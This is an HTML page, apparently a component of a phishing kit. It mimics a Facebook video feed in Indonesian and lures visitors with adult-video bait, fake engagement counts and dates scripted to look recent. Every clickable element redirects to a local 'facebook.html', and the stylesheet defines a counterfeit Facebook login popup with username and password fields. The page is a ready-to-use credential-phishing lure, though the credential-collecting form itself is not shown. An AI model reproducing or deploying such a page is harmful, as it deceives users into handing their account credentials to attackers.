<!DOCTYPE html><html><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title id="a1">Videos 18+</title>
  <link media="all" rel="stylesheet" type="text/css" href="css/style_1.css">
  <link rel="icon" href="images/fav.png">

  <link media="all" rel="stylesheet" type="text/css" href="css/style.css">
</head>
<style>
.popup-login {
    background: rgba(0, 0, 0, 0.5);
    width: 100%;
    height: 100%;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 999999999999999999;
}

.popup-box-login-fb {
    background: #eceff6;
    max-width: 330px;
    height: auto;
    position: relative;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    font-family: "Teko";
    color: #000;
    border-radius: 10px;
}

.navbar-fb {
    background: #3b5998;
    height: auto;
    max-width: 330px;
    padding: 6px;
    border-top-left-radius: 10px;
    border-top-right-radius: 10px;
}

.navbar-fb img {
    width: 115px;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.content-box-fb {
    width: 300px;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.content-box-fb .alert {
    display: none;
    left: -15px;
    position: relative;
    width: 330px;
    padding: 5px;
    background: red;
    color: #fff;
    font-size: 13px;
    font-family: "Roboto";
}

.content-box-fb img {
    width: 75;
    margin-top: 20px;
    margin-left: auto;
    margin-right: auto;
    border-radius: 12px;
    display: block;
}

.txt-login-fb {
    width: 290px;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    margin-bottom: 17px;
    padding: 8px;
    color: #90949c;
    font-size: 16px;
    font-family: Roboto;
    text-align: center;
    display: block;
}

input[type="text"],
input[type="password"] {
    width: 90%;
    height: auto;
    padding: 12px;
    color: #000;
    font-size: 14px;
    font-weight: 400;
    font-family: "Lato", sans-serif;
    border: 1px solid #bdbebf;
    cursor: pointer;
    outline: none;
}

.login-form input[type="text"] {
    margin: 0;
    padding-bottom: 13px;
    border-bottom: none;
    border-radius: 4px 4px 0 0;
    box-shadow: 0 -1px 0 #e0e0e0 inset, 0 0px 0px rgba(0, 0, 0, 0.23) inset;
}

.login-form input[type="password"] {
    margin: 0;
    border-top: none;
    border-radius: 0 0 4px 4px;
    box-shadow: 0 -0px 0 rgba(0, 0, 0, 0.23) inset,
        0 0px 0px rgba(255, 255, 255, 0.1);
}

.btn-login-fb {
    background: #1778f2;
    width: 100%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    padding: 10px;
    color: #fff;
    font-size: 14px;
    font-family: Roboto;
    font-weight: bold;
    text-align: center;
    text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
    border: 1px solid #3578e5;
    border-radius: 5px;
    box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
    outline: none;
    display: block;
}

.btn-login-fb.disabled {
    pointer-events: none;
    background: #8b9dc3;
    border: 1px solid #8b9dc3;
}

.txt-create-account {
    margin-top: 4px;
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.txt-not-now {
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.txt-forgotten-password {
    width: 100%;
    height: auto;
    margin-bottom: 30px;
    padding: 5px;
    color: #7596c8;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.language-box {
    width: 100%;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.language-name {
    width: 40%;
    height: auto;
    margin: 5px;
    margin-bottom: 0px;
    color: #3b5998;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: inline-block;
}

.language-name i {
    width: 23px;
    padding: 4px;
    color: #90949c;
    border: 1px solid #3b5998;
    border-radius: 3px;
}

.language-name-active {
    color: #90949c;
    font-weight: bold;
}

.copyrights {
    width: 40%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    color: #90949c;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: block;
}
</style>
<body>
  <div class="header"> 
   <nav class="nav"> 
    <div> 
     <svg onclick="login()" viewbox="0 0 28 28" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6" fill="#afb3b5" height="28" width="28"> 
      <path d="M17.5 23.979 21.25 23.979C21.386 23.979 21.5 23.864 21.5 23.729L21.5 13.979C21.5 13.427 21.949 12.979 22.5 12.979L24.33 12.979 14.017 4.046 3.672 12.979 5.5 12.979C6.052 12.979 6.5 13.427 6.5 13.979L6.5 23.729C6.5 23.864 6.615 23.979 6.75 23.979L10.5 23.979 10.5 17.729C10.5 17.04 11.061 16.479 11.75 16.479L16.25 16.479C16.939 16.479 17.5 17.04 17.5 17.729L17.5 23.979ZM21.25 25.479 17 25.479C16.448 25.479 16 25.031 16 24.479L16 18.327C16 18.135 15.844 17.979 15.652 17.979L12.348 17.979C12.156 17.979 12 18.135 12 18.327L12 24.479C12 25.031 11.552 25.479 11 25.479L6.75 25.479C5.784 25.479 5 24.695 5 23.729L5 14.479 3.069 14.479C2.567 14.479 2.079 14.215 1.868 13.759 1.63 13.245 1.757 12.658 2.175 12.29L13.001 2.912C13.248 2.675 13.608 2.527 13.989 2.521 14.392 2.527 14.753 2.675 15.027 2.937L25.821 12.286C25.823 12.288 25.824 12.289 25.825 12.29 26.244 12.658 26.371 13.245 26.133 13.759 25.921 14.215 25.434 14.479 24.931 14.479L23 14.479 23 23.729C23 24.695 22.217 25.479 21.25 25.479Z"> 
      </path> 
     </svg> 
    </div> 
    <div> 
     <svg onclick="login()" viewbox="0 0 28 28" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6" fill="#afb3b5" height="28" width="28"> 
      <path d="M10.5 4.5c-2.272 0-2.75 1.768-2.75 3.25C7.75 9.542 8.983 11 10.5 11s2.75-1.458 2.75-3.25c0-1.482-.478-3.25-2.75-3.25zm0 8c-2.344 0-4.25-2.131-4.25-4.75C6.25 4.776 7.839 3 10.5 3s4.25 1.776 4.25 4.75c0 2.619-1.906 4.75-4.25 4.75zm9.5-6c-1.41 0-2.125.841-2.125 2.5 0 1.378.953 2.5 2.125 2.5 1.172 0 2.125-1.122 2.125-2.5 0-1.659-.715-2.5-2.125-2.5zm0 6.5c-1.999 0-3.625-1.794-3.625-4 0-2.467 1.389-4 3.625-4 2.236 0 3.625 1.533 3.625 4 0 2.206-1.626 4-3.625 4zm4.622 8a.887.887 0 00.878-.894c0-2.54-2.043-4.606-4.555-4.606h-1.86c-.643 0-1.265.148-1.844.413a6.226 6.226 0 011.76 4.336V21h5.621zm-7.122.562v-1.313a4.755 4.755 0 00-4.749-4.749H8.25A4.755 4.755 0 003.5 20.249v1.313c0 .518.421.938.937.938h12.125c.517 0 .938-.42.938-.938zM20.945 14C24.285 14 27 16.739 27 20.106a2.388 2.388 0 01-2.378 2.394h-5.81a2.44 2.44 0 01-2.25 1.5H4.437A2.44 2.44 0 012 21.562v-1.313A6.256 6.256 0 018.25 14h4.501a6.2 6.2 0 013.218.902A5.932 5.932 0 0119.084 14h1.861z"> 
      </path> 
     </svg> 
    </div> 
    <div class="nav_bottom-border"> 
     <div class="nav_bottom-border-icon"> 
      <svg onclick="login()" viewbox="0 0 28 28" class="x1lliihq x1k90msu x2h7rmj x1qfuztq x5e5rjt" fill="#1b74e4" height="28" width="28"> 
       <path d="M8.75 25.25C8.336 25.25 8 24.914 8 24.5 8 24.086 8.336 23.75 8.75 23.75L19.25 23.75C19.664 23.75 20 24.086 20 24.5 20 24.914 19.664 25.25 19.25 25.25L8.75 25.25ZM17.164 12.846 12.055 15.923C11.591 16.202 11 15.869 11 15.327L11 9.172C11 8.631 11.591 8.297 12.055 8.576L17.164 11.654C17.612 11.924 17.612 12.575 17.164 12.846M21.75 2.75 6.25 2.75C4.182 2.75 2.5 4.432 2.5 6.5L2.5 18C2.5 20.068 4.182 21.75 6.25 21.75L21.75 21.75C23.818 21.75 25.5 20.068 25.5 18L25.5 6.5C25.5 4.432 23.818 2.75 21.75 2.75"> 
       </path> 
      </svg> 
     </div> 
     <div class="nav_bottom-border-blue"></div> 
    </div> 
    <div> 
     <svg onclick="login()" viewbox="0 0 28 28" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6" fill="#afb3b5" height="28" width="28"> 
      <path d="M17.5 23.75 21.75 23.75C22.164 23.75 22.5 23.414 22.5 23L22.5 14 22.531 14C22.364 13.917 22.206 13.815 22.061 13.694L21.66 13.359C21.567 13.283 21.433 13.283 21.34 13.36L21.176 13.497C20.591 13.983 19.855 14.25 19.095 14.25L18.869 14.25C18.114 14.25 17.382 13.987 16.8 13.506L16.616 13.354C16.523 13.278 16.39 13.278 16.298 13.354L16.113 13.507C15.53 13.987 14.798 14.25 14.044 14.25L13.907 14.25C13.162 14.25 12.439 13.994 11.861 13.525L11.645 13.35C11.552 13.275 11.419 13.276 11.328 13.352L11.155 13.497C10.57 13.984 9.834 14.25 9.074 14.25L8.896 14.25C8.143 14.25 7.414 13.989 6.832 13.511L6.638 13.351C6.545 13.275 6.413 13.275 6.32 13.351L5.849 13.739C5.726 13.84 5.592 13.928 5.452 14L5.5 14 5.5 23C5.5 23.414 5.836 23.75 6.25 23.75L10.5 23.75 10.5 17.5C10.5 16.81 11.06 16.25 11.75 16.25L16.25 16.25C16.94 16.25 17.5 16.81 17.5 17.5L17.5 23.75ZM3.673 8.75 24.327 8.75C24.3 8.66 24.271 8.571 24.238 8.483L23.087 5.355C22.823 4.688 22.178 4.25 21.461 4.25L6.54 4.25C5.822 4.25 5.177 4.688 4.919 5.338L3.762 8.483C3.729 8.571 3.7 8.66 3.673 8.75ZM24.5 10.25 3.5 10.25 3.5 12C3.5 12.414 3.836 12.75 4.25 12.75L4.421 12.75C4.595 12.75 4.763 12.69 4.897 12.58L5.368 12.193C6.013 11.662 6.945 11.662 7.59 12.193L7.784 12.352C8.097 12.609 8.49 12.75 8.896 12.75L9.074 12.75C9.483 12.75 9.88 12.607 10.194 12.345L10.368 12.2C11.01 11.665 11.941 11.659 12.589 12.185L12.805 12.359C13.117 12.612 13.506 12.75 13.907 12.75L14.044 12.75C14.45 12.75 14.844 12.608 15.158 12.35L15.343 12.197C15.989 11.663 16.924 11.663 17.571 12.197L17.755 12.35C18.068 12.608 18.462 12.75 18.869 12.75L19.095 12.75C19.504 12.75 19.901 12.606 20.216 12.344L20.38 12.208C21.028 11.666 21.972 11.666 22.62 12.207L23.022 12.542C23.183 12.676 23.387 12.75 23.598 12.75 24.097 12.75 24.5 12.347 24.5 11.85L24.5 10.25ZM24 14.217 24 23C24 24.243 22.993 25.25 21.75 25.25L6.25 25.25C5.007 25.25 4 24.243 4 23L4 14.236C2.875 14.112 2 13.158 2 12L2 9.951C2 9.272 2.12 8.6 2.354 7.964L3.518 4.802C4.01 3.563 5.207 2.75 6.54 2.75L21.461 2.75C22.793 2.75 23.99 3.563 24.488 4.819L25.646 7.964C25.88 8.6 26 9.272 26 9.951L26 11.85C26 13.039 25.135 14.026 24 14.217ZM16 23.75 16 17.75 12 17.75 12 23.75 16 23.75Z"> 
      </path> 
     </svg> 
    </div> 
    <div class="notification"> 
     <img class="notification-img" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/bell.png" width="24px"> 
    </div> 
    <div> 
     <svg onclick="login()" viewbox="0 0 28 28" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6" fill="#afb3b5" height="28" width="28"> 
      <path d="M23.5 4a1.5 1.5 0 110 3h-19a1.5 1.5 0 110-3h19zm0 18a1.5 1.5 0 110 3h-19a1.5 1.5 0 110-3h19zm0-9a1.5 1.5 0 110 3h-19a1.5 1.5 0 110-3h19z"> 
      </path> 
     </svg> 
    </div> 
   </nav> 
  </div> 
  <div class="wrap"> 
   <div class="back-line"> 
    <div class="back-line__left"> 
     <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/arrow-left.svg" width="25px"> 
     <p class="back-line__left-text" id="a2">Video</p> 
    </div> 
    <div onclick="login()" class="back-line__right"> 
     <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/user-loupe.png" width="70px"> 
    </div> 
   </div> 
   <!-- 1 --> 
   <div class="post-block"> 
    <div class="post-block__head"> 
     <div class="post-block__head-avatar"> 
      <div onclick="login()" class="head-avatar__logo"> 
       <img src="https://i.pinimg.com/236x/3a/23/0a/3a230a26fe8330ef60c2c7a22815ae67.jpg" width="40px" height="40px"> 
      </div> 
      <div class="head-avatar__text"> 
       <div class="ellipsis"> 
        <span id="a3">Kumpulan Viral Terbaru Sekarang</span> 
       </div> 
       <div> 
        <span class="grey-text" id="a4">Disarankan untuk Anda · 6d ·</span> 
        <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/gl.png" width="10px" style="margin-left: 5px; vertical-align: middle;"> 
       </div> 
      </div> 
      <div> 
       <span onclick="login()" class="blue-text" id="a5">Ikuti</span> 
      </div> 
      <div class="head-avatar__dots"> 
       <img class="post-block__head-dots" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/dots.svg" width="20px"> 
      </div> 
     </div> 
    </div> 
    <p class="post-block__video-description" id="a6">Video Hot Terbaru Untuk Anda🔥 🔥 🔥</p> 
    <div class="post-block__img"> 
     <img onclick="login()" class="post-block__img1" src="https://telegra.ph/file/8bb5c6646dea32c0fa2db.jpg"> 
     <img onclick="login()" class="post-block__img-play" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/play.png"> 
    </div> 
    <div class="post-block__like-data"> 
     <div class="post-block__like-data-left"> 
      <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/like.png" width="15px" style="margin-right: 3px;"> 
      <span>157k</span> 
     </div> 
     <div class="post-block__like-data-right"> 
      <div>
        1.1K 
       <span onclick="login()" id="a7">komentar</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        2.5K 
       <span id="a8">berbagi</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        9.9M 
       <span id="a9">tampilan</span> 
      </div> 
     </div> 
    </div> 
    <div class="post-block__actions"> 
     <div> 
      <span class="post-block__actions-like"></span> 
      <span id="a10">Suka</span> 
     </div> 
     <div> 
      <span class="post-block__actions-comment"></span> 
      <span id="a11">Komentar</span> 
     </div> 
     <div> 
      <span class="post-block__actions-share"></span> 
      <span id="a12">Bagikan</span> 
     </div> 
    </div> 
   </div> 
   <!-- 2 --> 
   <div class="post-block"> 
    <div class="post-block__head"> 
     <div class="post-block__head-avatar"> 
      <div onclick="login()" class="head-avatar__logo"> 
       <img src="https://i.pinimg.com/736x/9d/08/63/9d08639539bfd8c3b90491e1ef77e4b6.jpg" width="40px" height="40px"> 
      </div> 
      <div class="head-avatar__text"> 
       <div class="ellipsis"> 
        <span id="a13">Video Terbaik</span> 
       </div> 
       <div> 
        <span class="grey-text"> <script type="text/javascript">
                  document.write(new Date().toLocaleDateString(navigator.language || navigator.userLanguage, {
                    month: 'short',
                    day: 'numeric',
                  }))
                </script> · </span> 
        <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/gl.png" width="10px" style="margin-left: 5px; vertical-align: middle;"> 
       </div> 
      </div> 
      <div> 
       <span onclick="login()" class="blue-text" id="a14">Ikuti</span> 
      </div> 
      <div class="head-avatar__dots"> 
       <img class="post-block__head-dots" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/dots.svg" width="20px"> 
      </div> 
     </div> 
    </div> 
    <p class="post-block__video-description"> </p> 
    <div class="post-block__img"> 
     <img onclick="login()" class="post-block__img1" src="https://telegra.ph/file/774e54073de92403ece29.jpg"> 
     <img onclick="login()" class="post-block__img-play" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/play.png"> 
    </div> 
    <div class="post-block__like-data"> 
     <div class="post-block__like-data-left"> 
      <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/like.png" width="15px" style="margin-right: 3px;"> 
      <span>46k</span> 
     </div> 
     <div class="post-block__like-data-right"> 
      <div>
        1.3K 
       <span onclick="login()" id="a15">komentar</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        1.4K 
       <span id="a16">berbagi</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        5.4M 
       <span id="a17">tampilan</span> 
      </div> 
     </div> 
    </div> 
    <div class="post-block__actions"> 
     <div> 
      <span class="post-block__actions-like"></span> 
      <span id="a18">Suka</span> 
     </div> 
     <div> 
      <span class="post-block__actions-comment"></span> 
      <span id="a19">Komentar</span> 
     </div> 
     <div> 
      <span class="post-block__actions-share"></span> 
      <span id="a20">Bagikan</span> 
     </div> 
    </div> 
   </div> 
   <!-- 3 --> 
   <div class="post-block"> 
    <div class="post-block__head"> 
     <div class="post-block__head-avatar"> 
      <div onclick="login()" class="head-avatar__logo"> 
       <img src="https://i.pinimg.com/736x/74/02/d8/7402d8b5ce257de832ad4d2769f6d102.jpg" width="40px" height="40px"> 
      </div> 
      <div class="head-avatar__text"> 
       <div class="ellipsis"> 
        <span id="a21">Kompilasi video terbaik 2024</span> 
       </div> 
       <div> 
        <span class="grey-text"> <script type="text/javascript">
                  var d = new Date();
                  d.setDate(d.getDate() - 1);
                  document.write(d.toLocaleDateString(navigator.language || navigator.userLanguage, {
                    month: 'short',
                    day: 'numeric',
                  }));
                </script> · </span> 
        <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/gl.png" width="10px" style="margin-left: 5px; vertical-align: middle;"> 
       </div> 
      </div> 
      <div> 
       <span onclick="login()" class="blue-text" id="a22">Ikuti</span> 
      </div> 
      <div class="head-avatar__dots"> 
       <img class="post-block__head-dots" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/dots.svg" width="20px"> 
      </div> 
     </div> 
    </div> 
    <p class="post-block__video-description" id="a23">Yang terbaik tahun 2024 hanya di sini💦💦💦</p> 
    <div class="post-block__img"> 
     <img onclick="login()" class="post-block__img1" src="https://telegra.ph/file/4ea4e39d81f21754279b7.jpg"> 
     <img onclick="login()" class="post-block__img-play" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/play.png"> 
    </div> 
    <div class="post-block__like-data"> 
     <div class="post-block__like-data-left"> 
      <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/like.png" width="15px" style="margin-right: 3px;"> 
      <span>72k</span> 
     </div> 
     <div class="post-block__like-data-right"> 
      <div>
        1.2K 
       <span onclick="login()" id="a24">komentar</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        1.9K 
       <span id="a25">berbagi</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        7.1M 
       <span id="a26">tampilan</span> 
      </div> 
     </div> 
    </div> 
    <div class="post-block__actions"> 
     <div> 
      <span class="post-block__actions-like"></span> 
      <span id="a27">Suka</span> 
     </div> 
     <div> 
      <span class="post-block__actions-comment"></span> 
      <span id="a28">Komentar</span> 
     </div> 
     <div> 
      <span class="post-block__actions-share"></span> 
      <span id="a29">Bagikan</span> 
     </div> 
    </div> 
   </div> 
   <!-- 4 --> 
   <div class="post-block"> 
    <div class="post-block__head"> 
     <div class="post-block__head-avatar"> 
      <div onclick="login()" class="head-avatar__logo"> 
       <img src="https://i.pinimg.com/736x/7a/28/61/7a28619107a8fb6de4273ddf220698f1.jpg" width="40px" height="40px"> 
      </div> 
      <div class="head-avatar__text"> 
       <div class="ellipsis"> 
        <span id="a30">Video tersembunyi</span> 
       </div> 
       <div> 
        <span class="grey-text"> <script type="text/javascript">
                  var d = new Date();
                  d.setDate(d.getDate() - 2);
                  document.write(d.toLocaleDateString(navigator.language || navigator.userLanguage, {
                    month: 'short',
                    day: 'numeric',
                  }));
                </script> · </span> 
        <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/gl.png" width="10px" style="margin-left: 5px; vertical-align: middle;"> 
       </div> 
      </div> 
      <div> 
       <span onclick="login()" class="blue-text" id="a31">Ikuti</span> 
      </div> 
      <div class="head-avatar__dots"> 
       <img class="post-block__head-dots" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/dots.svg" width="20px"> 
      </div> 
     </div> 
    </div> 
    <p class="post-block__video-description" id="a32">Unduhan gratis hanya hari ini</p> 
    <div class="post-block__img"> 
     <img onclick="login()" class="post-block__img1" src="https://telegra.ph/file/201963f29206aaa866285.jpg"> 
     <img onclick="login()" class="post-block__img-play" src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/play.png"> 
    </div> 
    <div class="post-block__like-data"> 
     <div class="post-block__like-data-left"> 
      <img src="https://aureatedreams.com/utility/video-app-default/adult/fb_video/1/img/like.png" width="15px" style="margin-right: 3px;"> 
      <span>52k</span> 
     </div> 
     <div class="post-block__like-data-right"> 
      <div>
        2.3K 
       <span onclick="login()" id="a33">komentar</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        1.1K 
       <span id="a34">berbagi</span> 
      </div> 
      <div class="circle"></div> 
      <div>
        6.2M 
       <span id="a35">tampilan</span> 
      </div> 
     </div> 
    </div> 
    <div class="post-block__actions"> 
     <div> 
      <span class="post-block__actions-like"></span> 
      <span id="a36">Suka</span> 
     </div> 
     <div> 
      <span class="post-block__actions-comment"></span> 
      <span id="a37">Komentar</span> 
     </div> 
     <div> 
      <span class="post-block__actions-share"></span> 
      <span id="a38">Bagikan</span> 
     </div> 
    </div> 
   </div> 
  </div> 
    <script type="text/javascript">
        function login() {
                window.location = 'facebook.html';
                }
        </script>
    </body>
</html>